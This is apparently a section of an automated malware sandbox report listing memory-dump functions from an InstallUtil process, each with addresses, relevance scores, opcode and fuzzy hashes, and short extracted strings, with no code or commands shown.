                                                                • Instruction Fuzzy Hash: A3E1D4B4E01218CFDB64DFA5D954BDDBBB2BF88300F2081AAD809A7395DB355A85CF14
                                                                Function 0555BD38 Relevance: .2, Instructions: 219COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 483a48b02f690ae3c90a689bb5c881fc612b1f899f7f330bb42904d1526c2a58
                                                                • Instruction ID: 26027d096445cdc2878315194c8add4358667342ffd57c7d2b83dbf19ece8d46
                                                                • Opcode Fuzzy Hash: 483a48b02f690ae3c90a689bb5c881fc612b1f899f7f330bb42904d1526c2a58
                                                                • Instruction Fuzzy Hash: C9A19274E012188FEB28CF6AC954B9DBBF2BF89310F14C0AAD90DA7255DB345A85CF51
                                                                Function 0555C9D8 Relevance: .2, Instructions: 219COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 54d11846dd8ea121df5eb9b513adfc9c11df21515e436ca7f208ed91a8ba0ba7
                                                                • Instruction ID: 6bb5696e168d5159e06b2486a4680dab0ee14eaf717f0c6c46f06a52b864c4b1
                                                                • Opcode Fuzzy Hash: 54d11846dd8ea121df5eb9b513adfc9c11df21515e436ca7f208ed91a8ba0ba7
                                                                • Instruction Fuzzy Hash: 83A1A3B5E012188FEB28CF6AC944B9DBBF2BF89310F14C0AAD40DA7251DB745A85CF50
                                                                Function 0555A408 Relevance: .2, Instructions: 219COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1773fbc69895a08c63f60d420106db5ed5a2704b20f750224df2eaeee74b5c3b
                                                                • Instruction ID: 75baa49b4c9603f5e613baf30791499eff85327b8c0a039c9aac383ee091498a
                                                                • Opcode Fuzzy Hash: 1773fbc69895a08c63f60d420106db5ed5a2704b20f750224df2eaeee74b5c3b
                                                                • Instruction Fuzzy Hash: A6A1A374E012188FEB28CF6AC954B9DBBF2BF89311F14C1AAD40DA7255DB345A85CF50
                                                                Function 0555C388 Relevance: .2, Instructions: 219COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c8fed499bc37b9287c62b8aa703e13c8fff6d78476463d5da8565c8bc799ea39
                                                                • Instruction ID: 74100d2d8991a32b6025a21c9e923d2dc4180887a336857a5ffaaacbc6720954
                                                                • Opcode Fuzzy Hash: c8fed499bc37b9287c62b8aa703e13c8fff6d78476463d5da8565c8bc799ea39
                                                                • Instruction Fuzzy Hash: DEA1A4B4E052188FEB28CF6AC944B9DBBF2BF89310F14C0AAD40DA7255DB745A85CF50
                                                                Function 0555D670 Relevance: .2, Instructions: 219COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b6dc3b1a4efa48e3b7f1356c4910455d9ae6141bda638f484362497412aca17a
                                                                • Instruction ID: 53c1ba59e3419dbf6a39abb18a0a49b8ce435d2f784298b23fea9ff02b464867
                                                                • Opcode Fuzzy Hash: b6dc3b1a4efa48e3b7f1356c4910455d9ae6141bda638f484362497412aca17a
                                                                • Instruction Fuzzy Hash: 40A1A275E012188FEB28CF6AC944B9DBBF2BF89310F14C0AAD40DA7255DB745A85CF50
                                                                Function 0555B6E8 Relevance: .2, Instructions: 219COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3d149f713861d7d561a8e26098baae963098be1c0cab470461ca3f35e1a9c852
                                                                • Instruction ID: 9ec6d28d7e88a8ae583af962e85ceb87e06d9fbe759bfb4fae9ffb1bcaeb83c4
                                                                • Opcode Fuzzy Hash: 3d149f713861d7d561a8e26098baae963098be1c0cab470461ca3f35e1a9c852
                                                                • Instruction Fuzzy Hash: FEA1A274E012288FEB28CF6AC954B9DBBF2BF89310F14C1AAD40DA7255DB345A85CF51
                                                                Function 0555D028 Relevance: .2, Instructions: 218COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 38a0c040ae44fb5ff914ee37777e527677f33b9e199f054ac18175a5f74cbe78
                                                                • Instruction ID: c6420bc6b88a9610fb2f097a65f1f501923c8b1121592baac1dede5f22a28edb
                                                                • Opcode Fuzzy Hash: 38a0c040ae44fb5ff914ee37777e527677f33b9e199f054ac18175a5f74cbe78
                                                                • Instruction Fuzzy Hash: 1FA19475E012188FEB28CF6AC944B9EBBF2BF89310F14C0AAD40DA7255DB345A85CF51
                                                                Function 0555B0A0 Relevance: .2, Instructions: 218COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9f9f2ae8a4e60b5600fe52022713eda0148f15bd5d40b7d43523820349dc8452
                                                                • Instruction ID: ca92735c267b8ceec68b980f5841777569f10d3f9c8ac76c057b6824b6747248
                                                                • Opcode Fuzzy Hash: 9f9f2ae8a4e60b5600fe52022713eda0148f15bd5d40b7d43523820349dc8452
                                                                • Instruction Fuzzy Hash: 1DA19174E012188FEB28CF6AC944B9DFBF2BF89310F14C1AAD809A7255DB345A85CF51
                                                                Function 0555AA58 Relevance: .2, Instructions: 218COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c03574ccee2c796828caa332664fbf374c9aa2689e9dd55b911983abcba0bb63
                                                                • Instruction ID: fa7c36dc0d0f71140ad1b23e4cf909f410b0f0e5e9fb0119a4daaa14842201e2
                                                                • Opcode Fuzzy Hash: c03574ccee2c796828caa332664fbf374c9aa2689e9dd55b911983abcba0bb63
                                                                • Instruction Fuzzy Hash: 1CA19274E012288FEB28CF6AC944B9DBBF2BF89311F14C1AAD40DA7255DB345A85CF51
                                                                Function 0555D018 Relevance: .2, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f0e34516512dc01d2b7902946496baa0b61b762e17a9d6966947dbea96a644f8
                                                                • Instruction ID: c767caae3a6a0b0051df14e78e4ac0cb0a18306dbe4b04c69a09711b64612b74
                                                                • Opcode Fuzzy Hash: f0e34516512dc01d2b7902946496baa0b61b762e17a9d6966947dbea96a644f8
                                                                • Instruction Fuzzy Hash: F3719771E016188FEB68CF6AC945B9EBBF2BF89300F14C0AAD50DA7254DB345A85CF51
                                                                Function 0555B08F Relevance: .2, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50e52dac8567dde965cd059f5bbc9f7c4aca5d70299e42eb6f89c7e4f01aa9b1
                                                                • Instruction ID: 602d52da2a9fcb1f033194d5549701ca624d0be36630e3d6818c558214e39b94
                                                                • Opcode Fuzzy Hash: 50e52dac8567dde965cd059f5bbc9f7c4aca5d70299e42eb6f89c7e4f01aa9b1
                                                                • Instruction Fuzzy Hash: 017196B1E006188FEB28CF6AC95579EBBF2BF89310F14C0AAD50DA7255DB344A85CF51
                                                                Function 0555AA57 Relevance: .2, Instructions: 158COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 519754e3aa272e800eb7e8dcc7c5a2548e9733dc3515dcfc6c544160e2232768
                                                                • Instruction ID: 59227121b24dc35393ef8dde91cd0ba7e2b60c8d15eb8911e6e0ba559edbbd6d
                                                                • Opcode Fuzzy Hash: 519754e3aa272e800eb7e8dcc7c5a2548e9733dc3515dcfc6c544160e2232768
                                                                • Instruction Fuzzy Hash: 58719670E006188FEB28CF6AC944B9DBBF2BF89300F14C1AAD40DA7255DB744A85CF51
                                                                Function 055585FC Relevance: .1, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 13ea4ad1aa35a18f4efc4108ec9d50a405a11622e85fe46018791f4f180c5871
                                                                • Instruction ID: b4519d47c1659225bb73ce2e99d757a89fc192a67cce1fbc6aadcd424bc90c20
                                                                • Opcode Fuzzy Hash: 13ea4ad1aa35a18f4efc4108ec9d50a405a11622e85fe46018791f4f180c5871
                                                                • Instruction Fuzzy Hash: 0C41E5B0D002088BDB18DFAAD8547DEBBF2BF88310F24C16AD419BB254DB754946CF54
                                                                Function 0555BD28 Relevance: .1, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e1dcd67369fdab7c6de8a311a0300973052073dc8bd2f187bc73f11b1be759c5
                                                                • Instruction ID: 76be23d50f6cb68eac8b458de49491cbc149be7d08cdef3a58b99c55f9a8a132
                                                                • Opcode Fuzzy Hash: e1dcd67369fdab7c6de8a311a0300973052073dc8bd2f187bc73f11b1be759c5
                                                                • Instruction Fuzzy Hash: 2D4179B1E016188BEB58CF6BC9457CAFAF3BFC8310F14C0AAD50CA6264EB7409858F51
                                                                Function 0555C378 Relevance: .1, Instructions: 108COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a841e053355d5a130b8793f5fc1f84d0e9f68fd1d7b9d245d3d3a59e6f78e591
                                                                • Instruction ID: 7cd3dd2d509054989bf9045fa56001c8c01d413b014ee5479f338c59d9d99975
                                                                • Opcode Fuzzy Hash: a841e053355d5a130b8793f5fc1f84d0e9f68fd1d7b9d245d3d3a59e6f78e591
                                                                • Instruction Fuzzy Hash: 7D4179B1D016189BEB58CF6BC9457CAFAF3AFC8300F04C1AAD50CA6254DB740A858F51
                                                                Function 0555D663 Relevance: .1, Instructions: 107COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef609e445592e9ee1227718c16f834f4f9b265f6b0338496730096cdd96f2928
                                                                • Instruction ID: 7d1d589b4b2d8e83a8ecce27add683fd8b4e322e8bd726f44e62cdc9f0c77787
                                                                • Opcode Fuzzy Hash: ef609e445592e9ee1227718c16f834f4f9b265f6b0338496730096cdd96f2928
                                                                • Instruction Fuzzy Hash: 93414AB1D016188BEB58CF6BC9457CAFAF3BFC8310F14C1AAD50CA6265DB740A858F51
                                                                Function 0555C9D7 Relevance: .1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6069f1e6bae862a4284d8917dcd9b6a8b514f220cd0eb8558f2c33c8ac92216f
                                                                • Instruction ID: dc66bb43f2a2a3e83b33735bf8551a88c36b6c9951bf90ce8162e442f836119e
                                                                • Opcode Fuzzy Hash: 6069f1e6bae862a4284d8917dcd9b6a8b514f220cd0eb8558f2c33c8ac92216f
                                                                • Instruction Fuzzy Hash: E04158B1E016188BEB58CF6BC95578AFAF3BFC8300F14C1AAC50CA6264DB740A858F51
                                                                Function 0555A407 Relevance: .1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 446f2940bdbc16e8b57d7d389ab6b4d5f251658810356f7de480f1a7aa335c96
                                                                • Instruction ID: bdb93b6ba3cdab64e4e926d90ad3e6dd55b1f3610af322ac2848a575724e60b3
                                                                • Opcode Fuzzy Hash: 446f2940bdbc16e8b57d7d389ab6b4d5f251658810356f7de480f1a7aa335c96
                                                                • Instruction Fuzzy Hash: C54154B1E016188BEB58CF6BC9457DAFAF3BFC8310F14C1AAC50CA6264DB740A858F51
                                                                Function 0555B6E7 Relevance: .1, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bd7d6005213f9a299271d456d140750db03fca5f70a2086c1cc104e29eb3f9c5
                                                                • Instruction ID: c78068a424b3f349f9fa877af9319d12d42e9ffa3fb15027a19978fbff5d218c
                                                                • Opcode Fuzzy Hash: bd7d6005213f9a299271d456d140750db03fca5f70a2086c1cc104e29eb3f9c5
                                                                • Instruction Fuzzy Hash: 994158B1E016188BEB58CF6BC9557CAFAF3BFC8310F14C1AAC50CA6264DB740A858F51
                                                                Function 00C56E7F Relevance: 10.5, Strings: 8, Instructions: 469COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ojq$(ojq$(ojq$(ojq$(ojq$(ojq$,nq$,nq
                                                                • API String ID: 0-912422979
                                                                • Opcode ID: bdf43aadfa868c3aa40076ba3c652b7745f7e0700b327df35a6a914a8b3677a5
                                                                • Instruction ID: 5056ff724e3cb9728eaeba55d994931fceadf8449d00b3edd9fdec1e64d1845f
                                                                • Opcode Fuzzy Hash: bdf43aadfa868c3aa40076ba3c652b7745f7e0700b327df35a6a914a8b3677a5
                                                                • Instruction Fuzzy Hash: 0A126E34A04209CFCB14CF69E984A9EBBF6FF48315F148659E819DB2A1D730ED85CB54
                                                                Function 00C5215C Relevance: 5.3, Strings: 4, Instructions: 317COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xnq$Xnq$Xnq$Xnq
                                                                • API String ID: 0-1335687363
                                                                • Opcode ID: c9d7017e9c4b5887fc37dd10f0ee8cff383547a2b6086efc4a1d8a3168b3089a
                                                                • Instruction ID: 97f705d083f050108d21c778bc8fd0613b63779794fd88a4a2d68a876b673320
                                                                • Opcode Fuzzy Hash: c9d7017e9c4b5887fc37dd10f0ee8cff383547a2b6086efc4a1d8a3168b3089a
                                                                • Instruction Fuzzy Hash: 3AB1C776A45239DFCB218FE8C8846D977B1FF4A312F604695C415BB162EB308D8EC785
                                                                Function 00C58801 Relevance: 4.1, Strings: 3, Instructions: 355COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq$4'jq$;jq
                                                                • API String ID: 0-1429056558
                                                                • Opcode ID: e53cae4189cfa32470990da15cb2faf5764bb43db2e3ab748cca221d104fc7af
                                                                • Instruction ID: de365228786ab9a81a801aa488c041ea582d0c5b15cc7edcc99cc8534e44651f
                                                                • Opcode Fuzzy Hash: e53cae4189cfa32470990da15cb2faf5764bb43db2e3ab748cca221d104fc7af
                                                                • Instruction Fuzzy Hash: 34C19F783041018FDB259B29C854B3D379AEF84B02F1800AAE862DB3B5DE29CDCD9759
                                                                Function 00C57808 Relevance: 3.2, Strings: 2, Instructions: 702COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $jq$$jq
                                                                • API String ID: 0-3720491408
                                                                • Opcode ID: a57d0c3d3eebf48d3b9b842fcdac417631cea538f55a053bd7a0a118a675dbf6
                                                                • Instruction ID: 57d7d0aca5c89b4a165e373b372ffda146e80af7c7892b0878e9a013dac30137
                                                                • Opcode Fuzzy Hash: a57d0c3d3eebf48d3b9b842fcdac417631cea538f55a053bd7a0a118a675dbf6
                                                                • Instruction Fuzzy Hash: 1C5220B4A00218CFDB15DBA8C950BAEBBB6FF44300F1081A9D50A6B366CF355E89DF55
                                                                Function 00C556B0 Relevance: 2.8, Strings: 2, Instructions: 265COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Hnq$Hnq
                                                                • API String ID: 0-3075287205
                                                                • Opcode ID: a8d190b95205f77dd73535fb48667bb7d3b143d03b8a43794616b2d92faae139
                                                                • Instruction ID: f3b326f2317f0e563cf15534fbd1da272d2f5db5339b978fd5ec5b8054533e54
                                                                • Opcode Fuzzy Hash: a8d190b95205f77dd73535fb48667bb7d3b143d03b8a43794616b2d92faae139
                                                                • Instruction Fuzzy Hash: B691DD347046548FCB159F28C868B7E7BE2AF88341F148569E846CB2A1CF398D89CB95
                                                                Function 00C5330D Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xnq$Xnq
                                                                • API String ID: 0-10259684
                                                                • Opcode ID: 0d8c44a46e2c55ef259b194aee911f0d43847ba32b47f5715867e7bfe6fdb4c5
                                                                • Instruction ID: d90d65c64f2bde00534c0e1e0d18654196b03ab0df8726911aece908f2963d5b
                                                                • Opcode Fuzzy Hash: 0d8c44a46e2c55ef259b194aee911f0d43847ba32b47f5715867e7bfe6fdb4c5
                                                                • Instruction Fuzzy Hash: D471B3B6642170DFCB258FE9C5C85A93B71FF8634276406A9C801EF562EB74CD4E8389
                                                                Function 05559510 Relevance: 2.7, Strings: 2, Instructions: 209COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4486506770.0000000005550000.00000040.00000800.00020000.00000000.sdmp, Offset: 05550000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_5550000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (&jq$(nq
                                                                • API String ID: 0-2454636555
                                                                • Opcode ID: 933eb25483a079456ed51d6f3745b1ceb387932ab8d422495a05fad4ce012c80
                                                                • Instruction ID: 2e1b29abd5947c918eca62d01bf061f1a42f963a39f354079c1109bbd438d1ae
                                                                • Opcode Fuzzy Hash: 933eb25483a079456ed51d6f3745b1ceb387932ab8d422495a05fad4ce012c80
                                                                • Instruction Fuzzy Hash: BB71A231F042198BDB15DFB8C860AAEBBF6BF88710F14446AE806A7384DE349D06C791
                                                                Function 00C55C10 Relevance: 2.7, Strings: 2, Instructions: 202COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,nq$,nq
                                                                • API String ID: 0-3932345633
                                                                • Opcode ID: 3101b7fa12e7426fff4da05632858112f926f9c13f00c1e1be6861718a90a209
                                                                • Instruction ID: 1854a705f9a5f70accac7dbce364e50c16f06010b346cd58238e5c7cf73ca3c4
                                                                • Opcode Fuzzy Hash: 3101b7fa12e7426fff4da05632858112f926f9c13f00c1e1be6861718a90a209
                                                                • Instruction Fuzzy Hash: E471C439A00A05CFCB14CF69C9A896EB7B2FF89302B658165D811EB361C735ED89CB54
                                                                Function 00C59C4F Relevance: 1.7, Strings: 1, Instructions: 456COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ojq
                                                                • API String ID: 0-3210286679
                                                                • Opcode ID: 4a35ec93458da6a185d86954a3f51876a20a4e66c154b88735c0e980bccd02d6
                                                                • Instruction ID: 484aa44122dda0f781725243b6f60da8b0f19fd86519a0853ff293f818ec2a3c
                                                                • Opcode Fuzzy Hash: 4a35ec93458da6a185d86954a3f51876a20a4e66c154b88735c0e980bccd02d6
                                                                • Instruction Fuzzy Hash: BF126238600509DFCB14CF69C984AAEBBF2FF84312F158655E815DB2A1D730EE85CB5A
                                                                Function 00C50C8F Relevance: 1.7, Strings: 1, Instructions: 401COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LRjq
                                                                • API String ID: 0-665714880
                                                                • Opcode ID: 3e2cd0329b01e7ae59364aa9ab304031045eebd089b4414b10cc14309d78d783
                                                                • Instruction ID: 33a99335749118475a0908477836ad5be6db17b113205005ee43e9f2669d91f1
                                                                • Opcode Fuzzy Hash: 3e2cd0329b01e7ae59364aa9ab304031045eebd089b4414b10cc14309d78d783
                                                                • Instruction Fuzzy Hash: F422B57490421ACFCB54EF64E995B9EBBB5FF48301F1086A5D849AB368DB306D89CF40
                                                                Function 00C50CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LRjq
                                                                • API String ID: 0-665714880
                                                                • Opcode ID: 7985db016f0310c9f666dcc39914ddd935acf52a7d65e388a332c733cf9b7739
                                                                • Instruction ID: e5dd32fbb54ab6db5a6e59328612bc5ad99aca91c7ede4780912c60a99dff893
                                                                • Opcode Fuzzy Hash: 7985db016f0310c9f666dcc39914ddd935acf52a7d65e388a332c733cf9b7739
                                                                • Instruction Fuzzy Hash: FB22B67490421ACFCB54EF64E995B9EBBB5FF48301F1086A5D809AB368DB306D89CF40
                                                                Function 00C5A208 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.4476450461.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_c50000_InstallUtil.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'jq
                                                                • API String ID: 0-3676250632
                                                                • Opcode ID: e45c73cf8b576dfa5286922ef11c5e90b9b4fd38f07ab7d4a3cb9965f2efc62c
                                                                • Instruction ID: 248693e9d8ee895b0c6b2c2a68ecbf5e26f4d0d92f233e8ead9cd4f7f9733e49
                                                                • Opcode Fuzzy Hash: e45c73cf8b576dfa5286922ef11c5e90b9b4fd38f07ab7d4a3cb9965f2efc62c
                                                                • Instruction Fuzzy Hash: F44148796001199FCB14DF6AC848BAE7BB5BB88311F100169E91A8B3B1CB71DD85DB92
                                                                Function 00C57450 Relevance: .2, Instructions: 201COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
